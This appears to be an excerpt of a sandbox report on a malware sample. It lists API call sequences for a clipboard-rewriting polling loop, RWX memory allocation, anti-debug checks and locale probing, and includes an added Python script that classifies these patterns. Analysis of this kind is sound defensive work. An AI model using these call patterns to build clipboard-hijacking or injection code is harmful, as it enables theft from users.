                                                    • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                    • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: __wsopen_s
                                                    • String ID:
                                                    • API String ID: 3347428461-0
                                                    • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                    • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                    • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                    • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                    • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                    • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                    • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                    • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                    • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                    • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                    APIs
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Exception@8Throw
                                                    • String ID:
                                                    • API String ID: 2005118841-0
                                                    • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                    • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                    • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                    • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Deallocate
                                                    • String ID:
                                                    • API String ID: 1075933841-0
                                                    • Opcode ID: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                    • Instruction ID: fec367d8aa59221bd54f7e77a34cd6e8baa5892bd02020f9b8e7ed08d49e55ed
                                                    • Opcode Fuzzy Hash: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                    • Instruction Fuzzy Hash: 71D067B1518611CEE764DF69E444656B7E4EF04310B24492FE4D9D2694E6749880CB44
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                    • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                    • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                    • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00AF9CC6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_af9000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction ID: dd19d58b6f7e690099ee2bb766952ec5166c1fb7654b2dca783c6bf6bb81f4b2
                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction Fuzzy Hash: A1113C79A00208EFDB01DF98CA85E99BFF5AF08350F158094FA489B362D771EA50DF90
                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 024F194D
                                                    • Sleep.KERNEL32(00001541), ref: 024F1957
                                                      • Part of subcall function 024FCE77: _strlen.LIBCMT ref: 024FCE8E
                                                    • OpenClipboard.USER32(00000000), ref: 024F1984
                                                    • GetClipboardData.USER32(00000001), ref: 024F1994
                                                    • _strlen.LIBCMT ref: 024F19B0
                                                    • _strlen.LIBCMT ref: 024F19DF
                                                    • _strlen.LIBCMT ref: 024F1B23
                                                    • EmptyClipboard.USER32 ref: 024F1B39
                                                    • GlobalAlloc.KERNEL32(00000002,00000001), ref: 024F1B46
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 024F1B70
                                                    • SetClipboardData.USER32(00000001,00000000), ref: 024F1B79
                                                    • GlobalFree.KERNEL32(00000000), ref: 024F1B80
                                                    • CloseClipboard.USER32 ref: 024F1BA4
                                                    • Sleep.KERNEL32(000002D2), ref: 024F1BAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                    • String ID: 4#E$i
                                                    • API String ID: 4246938166-2480119546
                                                    • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                    • Instruction ID: b1126ac48fd6b8fae4cd48a49e994cd6639031581c1e8c567baca201c0859cce
                                                    • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                    • Instruction Fuzzy Hash: EB511530C00785DAE311DFA4ED45BFD7774FF6A306F04522ADA09A2162FB709681CB69
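The two blocks above (the VirtualAlloc call at 00AF9CC6 and the clipboard routine at 024F194D) read more easily once the raw hex arguments are decoded: 00001000 and 00000040 are MEM_COMMIT and PAGE_EXECUTE_READWRITE, the 00000001 passed to GetClipboardData and SetClipboardData is CF_TEXT, and OpenClipboard, GetClipboardData, EmptyClipboard, SetClipboardData, CloseClipboard between two Sleep calls is the shape of a loop that polls the clipboard and writes modified text back. Both blocks also carry "based on PE: false", meaning the code lives in memory not backed by the mapped image. The script below is an added example written for this page, not Joe Sandbox code or part of the report: it parses blocks in the report's text layout, decodes those constants and tags the call patterns. The constant tables, tag names and pattern rules are its own assumptions; SAMPLE is an excerpt of the two blocks above.

```python
"""Triage Joe Sandbox 'APIs' blocks: parse the call list, decode constants, flag call patterns.
Added example, not part of the Joe Sandbox report. SAMPLE is an excerpt of two function blocks
from the report; the constant tables, tag names and pattern rules are this example's own."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x3000: "MEM_COMMIT|MEM_RESERVE"}
CLIP_FORMATS = {0x01: "CF_TEXT", 0x0D: "CF_UNICODETEXT"}
# A clipboard-rewrite routine reads, clears and writes back the clipboard in this order.
CLIPBOARD_SWAP = ["OpenClipboard", "GetClipboardData", "EmptyClipboard", "SetClipboardData", "CloseClipboard"]

API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
                    r"(?P<name>[A-Za-z0-9_@]+)\.(?P<module>[A-Za-z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"Source File: \S+, Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]  # None where the report prints '?' for an unresolved argument
    ref: int                   # address of the call site
    subcall: bool              # True for 'Part of subcall function' lines

@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    region_offset: Optional[int] = None
    based_on_pe: Optional[bool] = None  # False: the dump region is not a mapped PE image

def hexint(tok: str) -> Optional[int]:
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else None

def parse_blocks(text: str) -> List[FunctionBlock]:
    blocks: List[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        # 'APIs' always opens a block; 'Strings' only once the previous block has its source line.
        if line == "APIs" or (line == "Strings" and (cur is None or cur.based_on_pe is not None)):
            cur = FunctionBlock()
            blocks.append(cur)
        elif cur is not None and (m := API_RE.match(line)):
            args = [hexint(a) for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), m["sub"] is not None))
        elif cur is not None and (m := SOURCE_RE.search(line)):
            cur.region_offset, cur.based_on_pe = int(m["off"], 16), m["pe"] == "true"
    return blocks

def decode_args(c: ApiCall) -> List[str]:
    """Symbolic names for the arguments that matter to triage; '?' where the report had none."""
    a = c.args
    sym = lambda table, v: "?" if v is None else table.get(v, hex(v))
    if c.name == "VirtualAlloc" and len(a) >= 4:
        return [sym(MEM_FLAGS, a[2]), sym(PAGE_PROTECT, a[3])]
    if c.name in ("GetClipboardData", "SetClipboardData") and a:
        return [sym(CLIP_FORMATS, a[0])]
    if c.name == "Sleep" and a:
        return ["?" if a[0] is None else f"{a[0]} ms"]
    return []

def _is_subsequence(wanted: List[str], names: List[str]) -> bool:
    it = iter(names)
    return all(w in it for w in wanted)  # each 'in' consumes the iterator up to its match

def classify(b: FunctionBlock) -> set:
    tags = set()
    direct = [c.name for c in b.calls if not c.subcall]  # ignore inlined helper subcalls
    if _is_subsequence(CLIPBOARD_SWAP, direct):
        tags.add("clipboard-rewrite")
        if "Sleep" in direct:
            tags.add("polling-loop")
    for c in b.calls:
        if c.name == "VirtualAlloc" and len(c.args) >= 4 and c.args[3] == 0x40:
            tags.add("rwx-alloc")
        if c.name == "IsDebuggerPresent":
            tags.add("anti-debug")
    if b.based_on_pe is False:
        tags.add("non-pe-region")
    return tags

SAMPLE = """\
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00AF9CC6
• Source File: 00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false
APIs
• Sleep.KERNEL32(00001541), ref: 024F1957
  • Part of subcall function 024FCE77: _strlen.LIBCMT ref: 024FCE8E
• OpenClipboard.USER32(00000000), ref: 024F1984
• GetClipboardData.USER32(00000001), ref: 024F1994
• EmptyClipboard.USER32 ref: 024F1B39
• SetClipboardData.USER32(00000001,00000000), ref: 024F1B79
• CloseClipboard.USER32 ref: 024F1BA4
• Sleep.KERNEL32(000002D2), ref: 024F1BAF
Strings
• Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
"""

if __name__ == "__main__":
    for b in parse_blocks(SAMPLE):
        print(f"0x{b.region_offset:08X} {sorted(classify(b))} {[decode_args(c) for c in b.calls if decode_args(c)]}")
```

Subcall lines are excluded from the sequence match on purpose: the CRT helpers Joe Sandbox attributes to inlined subcalls (here _strlen) would otherwise interleave with the clipboard calls and obscure the order. The subsequence check requires the five clipboard calls in read-clear-write order, so a function that merely reads the clipboard, or that writes without first reading, is not tagged.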
                                                    APIs
                                                    • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 024F239C
                                                    • GetClientRect.USER32(?,?), ref: 024F23B1
                                                    • GetDC.USER32(?), ref: 024F23B8
                                                    • CreateSolidBrush.GDI32(00646464), ref: 024F23CB
                                                    • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024F23EA
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 024F240B
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 024F2416
                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 024F241F
                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 024F2443
                                                    • SetBkMode.GDI32(?,00000001), ref: 024F24CE
                                                    • _wcslen.LIBCMT ref: 024F24E6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                    • String ID:
                                                    • API String ID: 1529870607-0
                                                    • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                    • Instruction ID: e36fa8912aa6f79ead2a080dbf23a156a1b29f98dc63d38d233e1247361f0935
                                                    • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                    • Instruction Fuzzy Hash: E7710D72900218AFDB62DF64DD85FAEBBBCEB49751F0041A5F609E6151DA70AF80CF24
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 4168288129-2761157908
                                                    • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                    • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                    • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                    • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                    • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: ACP$OCP
                                                    • API String ID: 2299586839-711371036
                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                    • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                    • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0252BCF4,?,00000000), ref: 0252BA6E
                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0252BCF4,?,00000000), ref: 0252BA97
                                                    • GetACP.KERNEL32(?,?,0252BCF4,?,00000000), ref: 0252BAAC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: ACP$OCP
                                                    • API String ID: 2299586839-711371036
                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                    • Instruction ID: 92436fc01afdb4ccfc49c3d224f98b5bf1e02994e038ade0819ed61aca4d3191
                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                    • Instruction Fuzzy Hash: 0C21B832A00125AAE7348F54D901BA77BA6FB42F1CB468565E909D71C4F732DE48C358
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                    • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                    • String ID:
                                                    • API String ID: 2287132625-0
                                                    • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                    • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                    • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                    • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 025221A0
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221AD
                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0252BCB5
                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0252BD10
                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0252BD1F
                                                    • GetLocaleInfoW.KERNEL32(?,00001001,02520A1C,00000040,?,02520B3C,00000055,00000000,?,?,00000055,00000000), ref: 0252BD67
                                                    • GetLocaleInfoW.KERNEL32(?,00001002,02520A9C,00000040), ref: 0252BD86
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                    • String ID:
                                                    • API String ID: 2287132625-0
                                                    • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                    • Instruction ID: c84fc016986fa59997f97a531781f67e9754105dd158cbf3282ec6f58dfba2ba
                                                    • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                    • Instruction Fuzzy Hash: 21519572A002279BDB14DFA5DC40BBE7BB9FF56708F040525E900E72D0EB719909CB69
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C$C
                                                    • API String ID: 0-238425240
                                                    • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                    • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                    • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                    • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                    • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                    • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                    • String ID:
                                                    • API String ID: 2444527052-0
                                                    • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                    • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                    • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                    • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                    APIs
                                                      • Part of subcall function 02522141: GetLastError.KERNEL32(?,?,0251A9EC,?,00000000,?,0251CDE6,024F247E,00000000,?,00451F20), ref: 02522145
                                                      • Part of subcall function 02522141: _free.LIBCMT ref: 02522178
                                                      • Part of subcall function 02522141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025221B9
                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02520A23,?,?,?,?,0252047A,?,00000004), ref: 0252B353
                                                    • _wcschr.LIBVCRUNTIME ref: 0252B3E3
                                                    • _wcschr.LIBVCRUNTIME ref: 0252B3F1
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02520A23,00000000,02520B43), ref: 0252B494
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                    • String ID:
                                                    • API String ID: 2444527052-0
                                                    • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                    • Instruction ID: 40714d8749c820c4df33e0d1d1c054d32cb72676b790ffcf9f4225ec108205c0
                                                    • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                    • Instruction Fuzzy Hash: 72611971600327AAEB24AB34CC81BBA77ADFF56718F14442AE905D71C0EB74D548CBA8
                                                    APIs
                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorInfoLastLocale$_free
                                                    • String ID:
                                                    • API String ID: 2834031935-0
                                                    • Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                    • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
                                                    • Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                    • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
